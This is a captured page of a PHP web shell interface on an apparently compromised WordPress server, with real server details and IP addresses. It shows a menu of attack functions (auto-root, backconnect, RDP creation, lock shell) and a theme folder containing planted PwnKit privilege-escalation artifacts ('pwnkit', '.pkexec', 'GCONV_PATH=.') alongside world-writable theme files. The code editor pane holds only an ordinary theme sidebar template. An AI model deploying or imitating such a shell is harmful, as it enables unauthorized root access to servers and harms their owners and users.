Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
inselect /
wp-content /
themes /
phlox /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
auxin
[ DIR ]
drwxrwxrwx
auxin-content
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
languages
[ DIR ]
drwxrwxrwx
templates
[ DIR ]
drwxrwxrwx
woocommerce
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
README.txt
53.08
KB
-rwxrwxrwx
archive.php
1.61
KB
-rwxrwxrwx
comments.php
5.27
KB
-rwxrwxrwx
footer.php
436
B
-rwxrwxrwx
functions.php
816
B
-rwxrwxrwx
header.php
1.09
KB
-rwxrwxrwx
index.php
1.81
KB
-rwxrwxrwx
package-lock.json
685.47
KB
-rwxrwxrwx
page.php
1010
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
rtl.css
59.56
KB
-rwxrwxrwx
screenshot.png
1.46
MB
-rwxrwxrwx
search.php
864
B
-rwxrwxrwx
searchform.php
552
B
-rwxrwxrwx
sidebar-footer.php
3.22
KB
-rwxrwxrwx
sidebar-primary.php
3.42
KB
-rwxrwxrwx
sidebar-secondary.php
1.91
KB
-rwxrwxrwx
sidebar.php
193
B
-rwxrwxrwx
single.php
1.61
KB
-rwxrwxrwx
style.css
1.69
KB
-rwxrwxrwx
taxonomy.php
1016
B
-rwxrwxrwx
wpml-config.xml
2.53
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sidebar-secondary.php
<?php /** * Secondary sidebar * * * @package Auxin * @author averta (c) 2014-2022 * @link http://averta.net */ global $post; // if no result if( is_404() || empty( $post ) || is_search() ) { return; } // always generate secondary sidebar on customizer (useful for previewing live changes in sidebar positions) if( 2 === auxin_has_sidebar( $post ) || is_customize_preview() ) { ?> <aside class="aux-sidebar aux-sidebar-secondary"> <div class="sidebar-inner"> <div class="sidebar-content"> <?php if( is_active_sidebar( 'auxin-global-secondary-sidebar-widget-area' ) ){ echo '<div class="aux-widget-area">'; dynamic_sidebar( 'auxin-global-secondary-sidebar-widget-area' ); echo '</div>'; } // get page template name $page_tempalte_name = get_post_meta( $post->ID, '_wp_page_template', TRUE ); // if the current page is a blog page if ( ( $post->post_type == 'post' || strpos( $page_tempalte_name, 'blog' ) !== false ) && is_active_sidebar( 'auxin-blog-secondary-sidebar-widget-area' ) ) { echo '<div class="aux-widget-area">'; if( is_active_sidebar( 'auxin-blog-secondary-sidebar-widget-area' ) ){ dynamic_sidebar( 'auxin-blog-secondary-sidebar-widget-area' ); } echo '</div>'; } elseif( is_active_sidebar( 'auxin-pages-secondary-sidebar-widget-area' ) ){ echo '<div class="aux-widget-area">'; if( is_active_sidebar( 'auxin-pages-secondary-sidebar-widget-area' ) ){ dynamic_sidebar( 'auxin-pages-secondary-sidebar-widget-area' ); } echo '</div>'; } ?> </div><!-- end sidebar-content --> </div><!-- end sidebar-inner --> </aside><!-- end secondary siderbar --> <?php }
Close